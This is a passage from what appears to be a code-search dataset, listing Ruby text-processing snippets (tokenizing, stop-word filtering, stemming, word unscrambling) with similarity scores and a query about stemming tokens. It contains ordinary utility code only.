"def remove_unwanted_duplicates word_pairs\n all_sequences = word_pairs.map{ |pair| pair.first }\n\n duplicate_seqs = identify_duplicate_sequences all_sequences\n\n word_pairs.reject do |seq, original|\n duplicate_seqs.include? seq\n end\n end",
"def word_unscrambler(str, words)\n return words.keep_if {|word| word.chars.sort == str.chars.sort}\nend",
"def wordlist\n unless @whitelist.nil?\n @whitelist\n else\n @blacklist\n end\n end",
"def highlight_blacklisted_words\n params[:comment_text]&.gsub(/(#{Regexp.union(BLACKLISTED_WORDS).source})/i) { |s| \"<<#{s}>>\" }\n end",
"def remove_vowels(array_of_words)\n array_of_words.map do |word|\n word.delete(\"aeiouAEIOU\")\n end\nend",
"def dedupe(words)\n words.select do |word|\n word.downcase != @word.downcase \n end\n end",
"def interesting_words(sentence, stop_word_array=['a', 'the', 'on'])\n # TODO\nend",
"def all_words\n result = []\n tagged_words.each do |word|\n result << word[0] unless is_punctuation([ word[0], word[1] ])\n end\n result\n end",
"def non_opt_words(current)\n output = []\n (0..(current.length-1)).each do |index|\n ('a'..'z').each do |let|\n test_word = current.clone\n test_word[index] = let\n output << test_word if legal_word?(test_word)\n end\n end\n output.uniq\nend",
"def split_words\n @split_words ||= words\n .downcase\n .split\n .collect{|w| w.gsub /\\W/, ''}\n end",
"def remove_vowels(words)\n words.map { |word| word.delete \"aeiouAEIOU\" }\nend",
"def remove_w_words(sentence)\n \nend",
"def remove_affects_with_keywords(keywords)\n keywords\n list = @affects.select{ |a| a.fuzzy_match( keywords ) }\n list.each do |affect|\n affect.clear(false)\n end\n return\n end",
"def tokenize_string(str)\n str.downcase.split(/\\b+/).map do |word|\n word.gsub(/[^\\w ]/,\"\")\n end.reject{|word| word.size < 2 }\nend",
"def remove_punc(text)\n word_list = []\n\n\n # Checking for correct encoding and reencoding the string if necessary\n if ! text.valid_encoding?\n text = text.encode(\"UTF-16be\", :invalid=>:replace, :replace=>\"?\").encode('UTF-8')\n end\n \n # Removing puctuation\n words = text.split(/[ ,;{}`~!@#$%^&*<>.:\"'|?\\\\()_+=\\/\\[\\]\\-]/)\n \n # Looping though the list, checking for valid words, and changing their case\n for word in words\n word = word[/\\w*/]\n word.downcase!\n word_list.push(word)\n end\n\n # Deleting blanks\n word_list.delete(\"\")\n\n return word_list\n\nend",
"def subtract_term_list_from_term_list(tl_left, tl_right)\n\tadd_term_and_term_list(flip_sign_on_term_list(tl_left), tl_right)\nend",
"def remove_search_tags(search_tags, resource_tags)\n tags_to_remove = search_tags.split()\n tags_to_response = resource_tags.split()-tags_to_remove\n tags_to_response = resource_tags.split()\n tag_list = Array.new\n tags_to_response.each do |tag|\n tag_list << tag if tag.size < 25\n end\n return tag_list.join(\" \")\n end",
"def one_off_words(str,word_list)\n result = []\n better_list = word_list.select{|word| word.size == str.size}\n better_list.each do |word|\n i = 0\n count = 0\n while i < word.size\n count += 1 if word[i] == str[i]\n i += 1\n end\n result << word if word.size - count == 1\n end\n result\nend",
"def extract\n # create hash of words with number of their instances in tokens excluding stopwords\n words_hash = Hash.new(0)\n @tokens.each { |w| \n unless w.empty? or stop_words_for(@language)[w]\n words_hash[w] += 1 \n end\n }\n\n idfs_hash = get_idfs(words_hash.keys)\n\n # calculate tf-idf for each word into keywords array\n keywords = []\n max_num = words_hash.values.max.to_f\n words_hash.each do |word, num|\n tf = num / max_num\n idf = idfs_hash[word]\n keywords << [word, (tf * idf).round(5), idf.round(5)]\n end\n\n # return keywords sorted by rank descending\n keywords.sort_by {|word, rank, idf| -rank}\n end",
"def remove_all_with(*c)\n return nil if c.nil?\n\n if c.is_a? String\n return self.map {|x| x.include?(c) ? nil : x}.compact\n elsif c.is_a? Array\n if c == [[]] || c == []\n return self\n else\n return self.reject{|word| /[#{c.join}]/ =~ word}\n end\n end\n end",
"def to_terms\n\t\t\traise \"Document invalid.\" unless @doc\n\t\t\tterms = @doc.gsub(/[^a-z]+/u, ' ').strip.split(' ')\n\t\t\tterms.reject! do |term|\n\t\t\t\t#@@stop_words.include?(term) || term.length < 4 || term.length > 20\n ((term.length < 3 && !SHORT_WORDS.include?(term)) || term.length > 20)\n\t\t\tend\n terms.collect! {|term| term.stem}\n terms = terms.select {|term| term.length > 1}\n\t\t\tterms - STOP_WORDS\n\t\tend",
"def subtract_term_list_from_term(term_list, term)\n\tadd_term_and_term_list(term, flip_sign_on_term_list(term_list))\nend",
"def untrain(tokens, category)\n tokens = tokens.uniq if binarized\n data.decrement_examples(category)\n \n tokens.each do |token|\n if data.token_trained?(token, category)\n vocab.delete(token)\n data.remove_token_from_category(category, token)\n end\n end\n end",
"def words_with_unapproved_synonyms\n return Keyword.joins(:synonyms).where(\"synonyms.approved\" => false).all\n end",
"def prune_actionwords\n puts \"Pruning actionwords\" if @options.verbose\n prune_actionwords_by_css(@@scenario_css, @@actionword_css)\n end",
"def unscramble(scramble)\n $word_list.select { |a| a.chars.sort == scramble.chars.sort }\nend",
"def match(w_array)\n w_array.delete_if {|w| w.split(\"\").sort != word.split(\"\").sort}\n end",
"def process_list(word_list)\n word_set = {}\n output = []\n\n word_list.each_with_index do |word, index|\n hash = hash_word(word)\n word_set[hash] ||= []\n word_set[hash] << wrap_word_with_index(word, index)\n\n if word_set[hash].length >= 2\n word_set[hash].each do |word_index|\n word, i = word_index\n # Place the word in it's original index/placement of the original string\n output.insert(i, word)\n end\n end\n end\n output.compact\nend",
"def search_values_without_quotes_and_filters\n search_string.gsub(Regexp.union(FILTER_WORD_REGEX, REGEX_WORD_IN_QUOTES), '').split(' ')\n end",
"def word_list\n # Returning only the terms of each definition as an array.\n list_of_terms = @words.map do |key, definition_instance|\n definition_instance.term\n end\n end",
"def words\n reject { |arg| arg.index('-') == 0 }\n end",
"def extract_all_words(html)\n doc = Nokogiri::HTML(html)\n keywords = []\n doc.css(\"meta[name='keywords']\").each do |node|\n keywords += node['content'].gsub(/\\s+/, \" \").gsub(/[^a-zA-Z\\- ',]/, '').squeeze(\" \").split(\",\")\n end\n text = String.new\n doc.css(\"meta[name='description']\").each do |node|\n text += node['content']\n end\n \n %w(script style link meta).each do |tag|\n doc.css(tag).each { |node| node.remove }\n end\n\n w = []\n doc.traverse do |node|\n if node.text? then\n w << node.content + \" \"\n end\n end\n text += w.join.gsub(/\\s+/, \" \").gsub(/[^a-zA-Z\\- ']/, '').squeeze(\" \")\n words = (text.downcase.split - STOPWORDS)\n \n final = (keywords + words)\n final.map do |w|\n w.stem\n end\n end",
"def split(text)\n text.downcase.scan(WORDS).uniq\n end",
"def real_words(permutations, wordlist)\n validwords = []\n wordlist = wordlist.to_set\n permutations.each { |x| validwords << x if wordlist.include?(x) }\n validwords\nend",
"def tokenize\n return [] if unencoded_text.blank?\n # kill off all punctuation except [stuff]'s or [stuff]'t\n # this includes hyphens (words are split)\n str = unencoded_text.\n downcase.\n gsub(/[^a-zA-Z0-9\\']+/, ' ').\n gsub(/(\\w)\\'([st])\\b/, '\\1!\\2').gsub(/\\'/, ' ').gsub(/!/, \"'\")\n # Busticate at whitespace\n words = str.strip.split(/\\s+/)\n words.reject!{|w| w.length < 3 }\n words.map!{|w| Wukong::encode_str(w) }\n end",
"def blacklist\n Regexp.new \"(#{ BLACKLIST.join '|' })\"\n end",
"def backwards_wording(words)\n words.select { |word| word.size >= 5 }.map { |word| word.reverse }\n end",
"def keyword_tweets\n\t\ttweets.select{|t| !t.contextual}\n\tend",
"def subtract_term_from_term_list(term, term_list)\n\tadd_term_and_term_list(flip_sign_on_term(term), term_list)\nend",
"def words\n terms.collect { |t| t.word }\n end",
"def keep_only_words_that_match(hangman_pattern)\n pattern = Regexp.new('^' + hangman_pattern.gsub(/-/,'.') + '$')\n\n change_wordlist(@words.select { |word,letters| word.word =~ pattern })\n end",
"def score(literatureText, wordsToExclude)\n excluded_word_hash = Hash.new(0)\n wordsToExclude.each do |key| \n excluded_word_hash[key] = 1\n end\n word_list = Array.new\n \n \n freq_hash, max = convert_to_freq_hash(literatureText.split(\" \"), excluded_word_hash) \n \n freq_hash.each do |k, v| \n word_list << k if v == max \n end\n \n word_list\nend",
"def word_unscrambler(word, dictionary)\nresult = []\ndictionary.each do |entry|\n\tif entry.split(\"\").sort.join(\"\") == word.split(\"\").sort.join(\"\")\n\t\tresult << entry\n\tend\nend\nresult \nend",
"def word_unscrambler(str, words)\n str_letters = str.split(\"\").sort\n\n res = []\n words.each do |word|\n word_letters = word.split(\"\").sort\n res << word if str_letters == word_letters\n end\n\n res\nend",
"def remove_unused_actionwords(actionword_css, used)\n puts \"Pruning unused actionwords\" if @options.verbose\n @xml.css(actionword_css).each { |actionword|\n name = actionword_name(actionword)\n next if used.include?(name)\n puts \"Removing actionword #{name}\" if @options.verbose\n actionword.remove\n }\n end",
"def words\n @words ||= text.split(/\\s/).delete_if { |word| word.length.zero? }\n end",
"def words\n scrabble_words = File.readlines(\"words.txt\")\n scrabble_words.map { |x| x.delete(\"\\n\") }\nend",
"def keywords(limit = 20)\n @keywords ||= {}\n @keywords[limit] ||= begin\n list = []\n count = 0\n _stopwords = Vidibus::Words.stopwords(*locales)\n for word in sort\n clean = word.permalink.gsub('-','')\n unless _stopwords.include?(clean)\n list << word\n count += 1\n break if count >= limit\n end\n end\n list\n end\n end",
"def mltify_text text\n \n coder = HTMLEntities.new\n text = coder.decode text\n text = sanitize( text, okTags = \"\" )\n text = coder.encode text\n words = text.downcase.gsub( /[^A-za-z0-9\\s'\\-#]/, \" \" ).split( /\\s/ )\n \n final_words = []\n words.each do |w|\n unless stop_words.include? w\n final_words << w\n end\n end\n RAILS_DEFAULT_LOGGER.info final_words.join( ' ' ).squish\n final_words.join( ' ' ).squish\n end",
"def remove_nils_and_false_from_array(array)\n array.reject!{ | word | word == nil || word == false }\nend",
"def my_array_deletion_method(source, thing_to_delete)\n\tsource.each do |word| if word.to_s.split(\"\").include? thing_to_delete\n\t\tsource.delete word\n\tend\nend\n\t source \nend",
"def stop_words\n return {} if self.collection_yaml.nil?\n return self[:stop_words] unless self[:stop_words].nil?\n \n self[:stop_words] = Treat.languages[self.treat_collection.language].stop_words\n self.save!\n \n self[:stop_words]\n end",
"def neutralize(sentence)\n words = sentence.split(' ')\n unchanged_words = sentence.split(' ')\n unchanged_words.each do |word|\n words.delete(word) if negative?(word)\n end\n\n words.join(' ')\nend",
"def words\n word_list = @lines.map do |line|\n line.split(\" \")\n end\n word_list.uniq\n end",
"def untrain(words)\n decreases = @categories.filter(@name).eject(words)\n @size -= decreases[@name]\n end",
"def _excluded_words\n Lexhub.configuration.excluded_words\n end",
"def prep_text_for_match_query(text,exclude_dblquote=false,remove_weak_terms=true)\r\n result = text.dup\r\n result.downcase! # downcase for stop_words removal\r\n result.gsub!(\"'s\",'')\r\n remove_punctuation_proper!(result,exclude_dblquote)\r\n # result.gsub!(/([^\\s]+)/) { |word|\r\n # weak_term?(word) ? '' : word\r\n # } if remove_weak_terms\r\n # result\r\n # #!? check terms as adverbs?\r\n words = result.split(/\\W/)\r\n if remove_weak_terms\r\n words = words.select {|w| !weak_term?(w) }\r\n end\r\n words.compact!\r\n words.join(\" \")\r\n end",
"def remove_sport\n 'basketball|baseball|softball|football|womens basketball'\n end"
] | [
"0.7914966",
"0.78771454",
"0.73791426",
"0.7214798",
"0.6798927",
"0.679369",
"0.6740443",
"0.6705289",
"0.66708285",
"0.6579485",
"0.64807314",
"0.6468068",
"0.644567",
"0.6221474",
"0.61697197",
"0.61367285",
"0.6133781",
"0.6107613",
"0.6104376",
"0.60622966",
"0.59931505",
"0.5978716",
"0.59767294",
"0.5958919",
"0.5913803",
"0.5881073",
"0.58381695",
"0.57916653",
"0.57864904",
"0.5777404",
"0.57696617",
"0.5768698",
"0.5765198",
"0.5747045",
"0.57293797",
"0.5709946",
"0.5700082",
"0.56654084",
"0.5654245",
"0.5618494",
"0.56154764",
"0.55808264",
"0.55804414",
"0.5574399",
"0.5561488",
"0.5538138",
"0.553141",
"0.5513802",
"0.551228",
"0.5507822",
"0.54987526",
"0.5496012",
"0.5480337",
"0.5445581",
"0.5435588",
"0.54272485",
"0.54248416",
"0.5423536",
"0.54154015",
"0.53974706",
"0.536563",
"0.5363187",
"0.53564847",
"0.53555065",
"0.53502804",
"0.5323779",
"0.5308607",
"0.5302967",
"0.5298905",
"0.5297966",
"0.5294196",
"0.5293045",
"0.5287165",
"0.5285448",
"0.528474",
"0.5271912",
"0.52679145",
"0.52575517",
"0.52525324",
"0.52506095",
"0.5241789",
"0.5235107",
"0.5228089",
"0.52256405",
"0.5204138",
"0.51837724",
"0.51760703",
"0.5175881",
"0.5174751",
"0.5165156",
"0.5158484",
"0.5157518",
"0.51554674",
"0.51446325",
"0.51386446",
"0.5133953",
"0.51146346",
"0.5090772",
"0.5088058",
"0.508548"
] | 0.84956324 | 0 |
function that takes a list of tokens, runs a stemmer on each token, and then returns a new list with the stems | def stem_tokens(tokens)
stem_list = []
# Looping through the list and finding the stem word for each word
for word in tokens
word = word[/\w*/]
s = word.stem
stem_list.push(s)
end
return stem_list
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def stem_each(ary)\n ary.map { |term| @stemmer.stem(term) }\n end",
"def analyze content\n unless content.respond_to? :split\n raise ArgumentError, \"#{content.class} has no #split\"\n end\n content.split(/\\s/).map {|w| @stemmer.stem w }\n end",
"def stem(word)\n stems = []\n\n FFI::MemoryPointer.new(:pointer) do |output|\n count = Hunspell.Hunspell_stem(self,output,word.to_s)\n ptr = output.get_pointer(0)\n\n if count > 0\n stems = ptr.get_array_of_string(0,count)\n end\n end\n\n return stems.map { |word| force_encoding(word) }\n end",
"def stem(data)\n if data\n words = data.split(/[+,_]|%20/) # split on '+', '_', or '%20'\n tokens = []\n\n words.each do |word|\n tokens.push(Lingua.stemmer(word, :language => \"en\"))\n end\n\n tokens.join(\",\")\n else\n \"Error: need input\"\n end\n end",
"def stem_token_count\n list = get_all_tokens_count.map! {|e| e[1] }\n return Stat.stem(list)\n end",
"def test_stemming\n data = []\n File.foreach(File.expand_path(File.dirname(__FILE__))+\"/porter2_testdata.txt\") do |line| \n data << line.chomp.split(/ /).reject { |e| e.empty? }\n end\n\n data.each do |input|\n word, stem = input\n assert_equal stem, PorterStemmer::Porter2.stem(word)\n end\n end",
"def test_stemming\n data = []\n current_dir = File.expand_path(File.dirname(__FILE__))\n voc_file = File.new(current_dir+\"/porter1_vocabulary.txt\", \"r\")\n out_file = File.new(current_dir+\"/porter1_output.txt\", \"r\")\n while ((word = voc_file.gets) && (stem = out_file.gets)) \n data << [word.chop, stem.chop]\n end\n voc_file.close\n out_file.close\n\n data.each do |input|\n word, stem = input\n assert_equal stem, PorterStemmer::Porter1.stem(word)\n end\n end",
"def stem_token_deviance( filter_count=nil )\n list = get_all_tokens_deviance( filter_count ).map! {|e| e[1] }\n return Stat.stem( Stat.recode_float(list, [0.0..1.0,1.0..2.0,2.0..3.0,3.0..4.0,4.0..5.0,5.0..6.0,6.0..7.0] ) )\n\n\t#list = get_all_tokens_deviance.map! {|e| e[1] }\n\t#return Stat.stem( Stat.recode_float(list, [0.0..1.0,1.0..2.0,2.0..3.0,3.0..4.0,4.0..5.0,5.0..6.0,6.0..7.0] ) )\n\n end",
"def each_term\n\t\t\tself.to_terms.each do |term|\n\t\t\t\tyield term.stem\n\t\t\tend\n\t\tend",
"def tokenize\n @s.reset\n\n tokens = []\n\n while token = consume\n tokens << token\n end\n\n tokens\n end",
"def tokenize\n @s.reset\n\n tokens = []\n\n while token = consume\n tokens << token\n end\n\n tokens\n end",
"def get_words\n @sentences.each_index do |i|\n s = @sentences[i]\n words = s.split(' ')\n words.each do |w|\n word = w.gsub(WORD_SANITIZE, '').downcase\n if belongs_to_known_abbreviations? word\n add_word_to_result(word, i)\n else\n add_word_to_result(word.gsub(DOT_SANITIZE, ''), i)\n end\n end\n end\n end",
"def tokenize\n \n end",
"def tokenize ; end",
"def tokenize ; end",
"def tokenize; end",
"def tokenize; end",
"def strip_to_stems\n str = self.sanitize_tags\n terms_a = str.gsub(/[^a-z]+/u, ' ').strip.split(' ')\n terms = terms_a.reject do |term|\n ((term.length < 3 && !SHORT_WORDS.include?(term)) || term.length > 20)\n end\n terms.collect! {|term| term.stem}\n terms = terms.select {|term| term.length > 1}\n terms = terms - STOP_STEMS\n return terms.join(' ')\n end",
"def stem_dfs\n case @options[:stemming]\n when :stem\n {}.tap do |ret|\n @dfs.each do |k, v|\n stem = k.stem\n ret[stem] ||= 0\n ret[stem] += v\n end\n end\n when :lemma\n # This may not work without sentential context to feed to the NLP\n # engine, but it's better than not trying anything at all\n {}.tap do |ret|\n @dfs.each do |k, v|\n yml = Cheetah.run(Admin::Setting.nlp_tool_path, '-l',\n stdin: k, stdout: :capture)\n result = YAML.load(yml)\n\n lemma = result[0]\n\n ret[lemma] ||= 0\n ret[lemma] += v\n end\n end\n else\n @dfs\n end\n end",
"def consume_mentions(mentions)\n mentions.map! do |mention|\n NLP.normalize(mention)\n end\n\n mention_text = mentions.join(\"\\n\").encode('UTF-8', invalid: :replace)\n # the same as above, we just add onto our array instead of\n # overwriting it\n mass_tikify(mention_text).each do |mention|\n @mentions << mention\n end\n\n nil\n end",
"def tokenize\n return [] if unencoded_text.blank?\n # kill off all punctuation except [stuff]'s or [stuff]'t\n # this includes hyphens (words are split)\n str = unencoded_text.\n downcase.\n gsub(/[^a-zA-Z0-9\\']+/, ' ').\n gsub(/(\\w)\\'([st])\\b/, '\\1!\\2').gsub(/\\'/, ' ').gsub(/!/, \"'\")\n # Busticate at whitespace\n words = str.strip.split(/\\s+/)\n words.reject!{|w| w.length < 3 }\n words.map!{|w| Wukong::encode_str(w) }\n end",
"def make_terms(text, lang)\n if !text\n return []\n end\n \n text = clean_text(text)\n\n # Turn non-breaking spaces into spaces. This is more complex than it should be, \n # due to Ruby version and platform character encoding differences\n # In particular Windows always seems to read as IBM437 encoding\n if RUBY_VERSION < \"1.9\"\n text.gsub!(/\\302\\240/,' ') \n else\n text.gsub!(\"\\u00A0\", \" \") # turn non-breaking spaces (UTF-8) into spaces \n end\n\n text = downcase_l(text,lang)\n\n # cleanups on Cable and Warlogs data\n text.gsub!(\"&\",\"\") # data has some HTML apostrophe mess, clean it up\n text.gsub!(\"amp;\",\"\")\n text.gsub!(\"apos;\",\"'\")\n text.gsub!(\"''\",\"'\") # double '' to single '\n text.gsub!(/<[^>]*>/, '') # strip things inside HTML tags\n\n # allow only a small set of characters\n text.tr!('\"()[]:,',' ') # turn certain punctation into spaces\n text = strippunct_l(text, lang) # remove anything not in the language charset (helps with OCR junk)\n text.gsub!(/\\s\\s*/, ' ') # collapse runs of spaces into single spaces\n\n terms = text.split(' ')\n terms.map!{ |t| t.sub(/^[^a-z0-9]+/,'').sub(/[^a-z0-9]+$/,'') } # remove leading/trailing punctuation\n \n # Now scan through the term list and spit out ungrams, bigrams\n termsout = []\n \n while t = terms.shift\n \n # look for a bigram starting with t\n if terms.length && terms[0] != nil\n t2 = terms[0]\n bigram = t + \"_\" + t2\n if @bigrams.include?(bigram)\n termsout << bigram\n #puts bigram\n next\n end\n end\n \n # DISABLED stemming, for easier installation (stemmer gem not req'd) js 21/2/2012\n # no bigram here, stem the individual term, output if it's \"acceptable\"\n #if @stem_terms \n # t = t.stem\n #end\n \n if term_acceptable(t)\n termsout << t\n end\n \n end\n \n return termsout\n end",
"def convert_to tokens\r\n join( tokens.map{|t| process(t.to_s) })\r\n end",
"def bulk_tweet_shortener(tweets) \n tweets.each do |phrase|\n puts word_substituter(phrase)\n end\nend",
"def bulk_tweet_shortener(tweets_array)\n tweets_array.collect do |phrase|\n puts word_substituter(phrase)\n end \nend",
"def parse\n parse_results = []\n @words.each_index do |i|\n i.upto(@words.size - 1) do |j|\n phrase = Phrase.new(@words[i..j])\n unless phrase_has_definitely_been_checked?(phrase, @existing_article_titles)\n break unless @repository.try_this_phrase_or_longer?(phrase)\n matching_articles = @repository.find_matching_articles(phrase)\n matching_articles.each do |matching_article|\n parse_results << [phrase.to_s, matching_article]\n end\n end\n end\n end\n parse_results = clean_results(parse_results, @existing_article_titles)\n end",
"def bulk_tweet_shortener(tweets)\n tweets.each do |tweet|\n output = word_substituter(tweet)\n puts output\n end\nend",
"def bulk_tweet_shortener(tweets)\n tweets.collect do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def bulk_tweet_shortener(tweets)\n # puts tweets\n tweets.each {|tweet| puts word_substituter(tweet)}\nend",
"def bulk_tweet_shortener(tweets)\n tweets.each { |x| puts word_substituter(x)}\nend",
"def tokens\n @tokens ||= Tokeniser.instance.tokenise(text)\n end",
"def bulk_tweet_shortener(tweets)\n tweets.each do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def bulk_tweet_shortener(tweets)\n tweets.each do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def bulk_tweet_shortener(tweets)\n tweets.each { |tweet|\n puts word_substituter(tweet)\n }\nend",
"def map_words(input)\n results = []\n input.split.each do |word|\n results << yield(word)\n end\n results\nend",
"def possible_stems(word, suffix)\n myaso.stems.select cut_stem(word, suffix)\n end",
"def bulk_tweet_shortener (tweets)\n if(tweets.size > 0)\n tweets.each do |tweet_each|\n puts word_substituter(tweet_each)\n end\n end\nend",
"def bulk_tweet_shortener(array)\t\n\t array.map {|a| puts word_substituter(a)}\nend",
"def lreduce(tokens)\n # NOTE scans from right to left\n size = tokens.size\n match = 1\n \n while match > 0 # last loop had any effect\n match = 0; k = tokens.size\n \n while k > 0\n catch :done do\n self.class.reducers.each do |tags, block|\n # not enough tokens available\n next if tokens.size - (k - 1) < tags.size\n mtokens = tokens[k-1, tags.size]\n \n # next unless all tags match\n next unless catch :fail do\n mtokens.zip(tags).each do |token,tag|\n case tag\n when Symbol, Module, Class\n throw :fail unless token.include?(tag)\n when String\n throw :fail unless token.word == tag\n when Regexp\n throw :fail unless token.word =~ tag\n when Proc\n throw :fail unless tag.call(token)\n when nil\n # matches any token\n else\n throw :fail unless token.fetch(tag.class) == tag\n end\n end\n end\n \n puts \"@#{k}: #{tags.inspect}\" if options[:verbose]\n \n object = block.call(*mtokens)\n if object.kind_of?(Token)\n # restart parsing having replaced many tokens with one\n tokens[k-1, tags.size] = object\n match += 1\n throw :done\n end\n end\n end\n \n k -= 1\n end\n \n end\n tokens\n end",
"def bulk_tweet_shortener(array)\n array.collect do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def bulk_tweet_shortener(array_tweet)\n array_tweet.each do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def bulk_tweet_shortener(array_of_tweets)\n array_of_tweets.each do |tweet|\n single_tweet = word_substituter(tweet)\n puts single_tweet\n end\nend",
"def word_split(phrase, list, output = nil)\n\n # Checks to see if any output has been initiated. necessary to avoid infinite recursion\n if output == nil\n output = []\n end\n\n list.each do |word|\n # If the current phrase begins with the word, we have a split point\n if phrase.start_with?(word)\n # Add the word to the output\n output.push(word)\n # Recursively call split function on the remaining portion of the phrase, passing along list and output.\n return word_split(phrase[word.length..-1], list, output)\n end\n end\n # Finally return output if no phrase.start_with?(word); returns true\n return output\nend",
"def bulk_tweet_shortener(tweet_array)\n tweet_array.each do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def bulk_tweet_shortener(tweet_array)\n tweet_array.each do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def tokenize\n post(\"token\")[\"token\"]\n end",
"def bulk_tweet_shortener(tweet_array)\n tweet_array.each do |tweet|\n puts word_substituter(tweet)\n # each element in tweet_array is the tweet string which\n # the word_substituter method can work on\n end\nend",
"def do_process(st)\n\n\t\teojeols = st.get_eojeols()\n\n for i in 0..(eojeols.length-1) do\n morphemes = eojeols[i].get_morphemes()\n tags = eojeols[i].get_tags()\n\n @nounMorphemes.clear\n @nounTags.clear\n\n for j in 0..(tags.length-1) do\n c = tags[i][0]\n if c == \"n\" then\n @nounMorphemes << morphemes[j]\n @nounTags << tags[j]\n elsif c == \"f\" then\n @nounMorphemes << morphemes[j]\n @nounTags << \"ncn\"\n end\n end\n\n eojeols[i].set_morphemes(@nounMorphemes)\n eojeols[i].set_tags(@nounTags)\n end\n\n st.set_eojeols(eojeols)\n\n\t\treturn st\n\tend",
"def tokens\n @tokens ||= tokenize_input\n end",
"def corpus_dfs\n stem_dfs\n end",
"def bulk_tweet_shortener(array_of_tweets)\n\tarray_of_tweets.each do |tweet|\n\t\tputs word_substituter(tweet)\n\tend\nend",
"def tokenize\n\t\tout_tokens = Array.new\n\t\t\n\t\t@token_offset = 0\n\t\tuntil @token_offset >= (self.length - 1)\n\t\t\tout_tokens << next_token\n\t\tend\n\t\t\n\t\tout_tokens.reject {|token| token.empty? }\n\tend",
"def call\n text\n .split\n .map { |token| convert_sym_to_punct(token) }\n .flat_map { |token| \n token = should_downcase(token)\n remove_symbols(token)\n }\n .flat_map { |token| token.split(Regex::COMMAS_OR_PUNCTUATION) }\n .flat_map { |token| token.split(Regex::VARIOUS) }\n .flat_map { |token| token.split(Regex::ENDS_WITH_PUNCTUATION2) }\n .flat_map { |token| split_dotted_email_or_digit(token) }\n .flat_map { |token| split_abbreviations(token) }\n .flat_map { |token| split_period_after_last_word(token) }\n .flat_map { |token| remove_slash_start_and_end(token) }\n end",
"def bulk_tweet_shortener(tweet_array)\n new_tweet = \"\"\n tweet_array.each do |string|\n new_tweet = word_substituter(string)\n puts new_tweet\n end\nend",
"def spoonerize(words)\n #...aaaaand SPOONERIZE!\nend",
"def tokenizer(aTextToParse)\n offset = -1\n tokens = aTextToParse.scan(/\\S+/).map do |word|\n term_name = Lexicon[word]\n raise StandardError, \"Word '#{word}' not found in lexicon\" if term_name.nil?\n\n pos = Rley::Lexical::Position.new(1, offset + 1)\n offset += word.length\n Rley::Lexical::Token.new(word, term_name, pos)\n end\n\n return tokens\nend",
"def tokenize(s)\nterms = s.gsub(/(\\s|\\d|\\W)+/u,' ').rstrip.strip.downcase.split(' ')\nterms.reject!{|term| @@stop_words.include?(term) || term.length < 3}\nterms\nend",
"def tokens\n @tokens ||= texts.map do |value|\n GoogleTranslateDiff::Tokenizer.tokenize(value)\n end\n end",
"def base_tokenize(text) #:nodoc:\n text.split(' ').map { |word| Token.new(word) }\n end",
"def base_tokenize(text) #:nodoc:\n text.split(' ').map { |word| Token.new(word) }\n end",
"def deflate(data, *args)\n results = data.split(/\\s+/).map do |raw_token|\n #puts \"raw_token: #{raw_token.inspect}\"\n normal_token = normalize(raw_token)\n #puts \"normal_token: #{normal_token.inspect}\"\n filtered_normal_token = filter(normal_token)\n #puts \"filtered_normal_token: #{filtered_normal_token.inspect}\"\n filtered_normal_token\n end.flatten.compact.uniq\n #puts \"results: #{results.inspect}\"\n return results\n end",
"def tokenize(list)\n result = []\n list.each_with_index do |str, i|\n newstr = str.dup\n if newstr.gsub(/\\A\\s+/, '').start_with?(@inst_entry)\n token = [:nil]\n syntax.each do |(symbol, regexp, tokenfix)|\n if mtchdata = str.match(regexp)\n token = [symbol, tokenfix.(mtchdata)]\n break\n end\n end\n else\n token = [:data, newstr]\n end\n result << { line: i, raw: str, token: token }\n end\n return result\n end",
"def each_sentence\n ARGF.each(\"\") do |paragraph|\n words = paragraph.split(\"\\n\").map {|line| line.chomp}\n yield words\n end\nend",
"def tokens(force = nil)\n data(force).map(&:token)\n end",
"def get_sentences\n # Get initial letters of sentences.\n initial_letters = @text.scan(SENTENCE_DELIMITER).map {|i| i[-1]}\n # Get sentences by splitting text with the pattern. \n # Sentences from index 1 to end are without initial letters.\n @sentences = @text.split(SENTENCE_DELIMITER)\n # Add the initial letters back to the sentences.\n (1...@sentences.length).each do |i|\n @sentences[i] = initial_letters[i - 1] + @sentences[i]\n end\n end",
"def tokenizer(aTextToParse)\n scanner = StringScanner.new(aTextToParse)\n tokens = []\n\n loop do\n scanner.skip(/\\s+/)\n curr_pos = scanner.pos\n word = scanner.scan(/\\S+/)\n break unless word\n\n term_name = Lexicon[word]\n raise StandardError, \"Word '#{word}' not found in lexicon\" if term_name.nil?\n\n pos = Rley::Lexical::Position.new(1, curr_pos + 1)\n tokens << Rley::Lexical::Token.new(word, term_name, pos)\n end\n\n return tokens\nend",
"def refresh_tokens\n @tokens = self.class.dup_tokens\n\n if @token_filter\n @tokens.each{|t| @token_filter.call(t)}\n end\n\n tokens_to_find = tokens.each_with_index.map do |t, i|\n [i, t.string] if t.string\n end.compact\n\n @tokens_to_find_indexes = tokens_to_find.map{|t| t[0]}\n @tokens_to_find_strings = tokens_to_find.map{|t| t[1]}\n\n tokens_to_extract = tokens.each_with_index.map do |t, i|\n [i, t.name] if t.extract?\n end.compact\n\n @tokens_to_extract_indexes = tokens_to_extract.map{|t| t[0]}\n @tokens_to_extract_names = tokens.map{|t| t.name}\n\n @have_tokens_to_extract = (@tokens_to_extract_indexes.size > 0)\n end",
"def mass_tikify(text)\n sentences = NLP.sentences(text)\n\n sentences.map do |s|\n tokens = NLP.tokenize(s).reject do |t|\n # Don't include usernames/urls as tokens\n (t.include?(\"@\") && t.length > 1) || t.include?(\"http\")\n end\n\n tokens.map { |t| tikify(t) }\n end\n end",
